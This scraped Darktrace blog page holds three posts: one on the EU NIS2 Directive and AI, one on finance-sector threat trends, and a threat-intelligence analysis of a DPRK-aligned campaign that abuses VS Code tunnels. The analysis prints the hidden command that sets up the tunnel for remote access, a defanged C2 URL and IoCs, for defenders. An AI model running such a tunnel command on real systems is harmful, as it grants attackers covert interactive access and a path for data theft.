Blog
/
/

Implications of NIS2 on cybersecurity and AI

Explore the key aspects of the NIS2 Directive, the latest EU cyber security legislation coming into effect in 2024. Learn how it impacts AI and security teams.
No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image

The NIS2 Directive requires member states to adopt laws that will improve the cyber resilience of organizations within the EU. It impacts organizations that are “operators of essential services”. Under NIS 1, EU member states could choose what this meant. In an effort to ensure more consistent application, NIS2 has set out its own definition. It eliminates the distinction between operators of essential services and digital service providers from NIS1, instead defining a new list of sectors:

  • Energy (electricity, district heating and cooling, gas, oil, hydrogen)
  • Transport (air, rail, water, road)
  • Banking (credit institutions)
  • Financial market infrastructures
  • Health (healthcare providers and pharma companies)
  • Drinking water (suppliers and distributors)
  • Digital infrastructure (DNS, TLD registries, telcos, data center providers, etc.)
  • ICT service providers (B2B): MSSPs and managed service providers
  • Public administration (central and regional government institutions, as defined per member state)
  • Space
  • Postal and courier services
  • Waste management
  • Chemicals
  • Food
  • Manufacturing of medical devices
  • Computers and electronics
  • Machinery and equipment
  • Motor vehicles, trailers and semi-trailers and other transport equipment
  • Digital providers (online market places, online search engines, and social networking service platforms) and research organizations.

With these updates, it becomes harder to try and find industry segments not included within the scope. NIS2 represents legally binding cyber security requirements for a significant region and economy. Standout features that have garnered the most attention include the tight timelines associated with notification requirements. Under NIS 2, in-scope entities must submit an initial report or “early warning” to the competent national authority or computer security incident response team (CSIRT) within 24 hours from when the entity became aware of a significant incident. This is a new development from the first iteration of the Directive, which used more vague language of the need to notify authorities “without undue delay”.

Another aspect gaining attention is oversight and regulation – regulators are going to be empowered with significant investigation and supervision powers including on-site inspections.

The stakes are now higher, with the prospect of fines that are capped at €10 million or 2% of an offending organization’s annual worldwide turnover – whichever is greater. Added to that, the NIS2 Directive includes an explicit obligation to hold members of management bodies personally responsible for breaches of their duties to ensure compliance with NIS2 obligations – and members can be held personally liable.  

The risk management measures introduced in the Directive are not altogether surprising – they reflect common best practices. Many organizations (especially those that are newly in scope for NIS2) may have to expand their cyber security capabilities, but there’s nothing controversial or alarming in the required measures.  For organizations in this situation, there are various tools, best practices, and frameworks they can leverage.  Darktrace in particular provides capabilities in the areas of visibility, incident handling, and reporting that can help.

NIS2 and Cyber AI

The use of AI is not an outright requirement within NIS2 – which may be down to lack of knowledge and expertise in the area, and/or the immaturity of the sector. The clue to this might be in the timing: the provisional agreement on the NIS2 text was reached in May 2022 – six months before ChatGPT and other open-source Generative AI tools propelled broader AI technology into the forefront of public consciousness. If the language were drafted today, it's not far-fetched to imagine AI being mentioned much more prominently and perhaps even becoming a requirement.

NIS2 does, however, very clearly recommend that “member states should encourage the use of any innovative technology, including artificial intelligence”[1].  Another section speaks directly to essential and important entities, saying that they should “evaluate their own cyber security capabilities, and where appropriate, pursue the integration of cyber security enhancing technologies, such as artificial intelligence or machine learning systems…”[2]

One of the recitals states that “member states should adopt policies on the promotion of active cyber protection”.  Where active cyber protection is defined as “the prevention, detection, monitoring, analysis and mitigation of network security breaches in an active manner.”[3]  

From a Darktrace perspective, our self-learning Cyber AI technology is precisely what enables our technology to deliver active cyber protection – protecting organizations and uplifting security teams at every stage of an incident lifecycle – from proactively hardening defenses before an attack is launched, to real-time threat detection and response, through to recovering quickly back to a state of good health.  

The visibility provided by Darktrace is vital to understanding the effectiveness of policies and ensuring policy compliance. NIS2 also covers incident handling and business continuity, which Darktrace HEAL addresses through AI-enabled incident response, readiness reports, simulations, and secure collaborations.

Reporting is integral to NIS2 and organizations can leverage Darktrace’s incident reporting features to present the necessary technical details of an incident and provide a jump start to compiling a full report with business context and impact.  

What’s next for NIS2

We don’t yet know the details for how EU member states will transpose NIS2 into national law – they have until 17th October 2024 to work this out. The Commission also commits to reviewing the functioning of the Directive every three years. Given how much our overall understanding and appreciation for not only the dangers of AI but also its power (perhaps even necessity in the realm of cyber security) is changing, we may see many member states will leverage the recitals’ references to AI in order to make a strong push if not a requirement that essential and important organizations within their jurisdiction leverage AI.

Organizations are starting to prepare now to meet the forthcoming legislation related to NIS2. Download our CISO’s Guide to NIS2 Preparedness, which includes everything you need to know to get ahead of the directive.

[1] (51) on page 11
[2] (89) on page 17
[3] (57) on page 12

No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
No items found.

Blog

/

Network

/

January 28, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

7. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

Network

/

January 23, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to hxxps://www[.]yespp[.]co[.]kr/common/include/code/out[.]php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI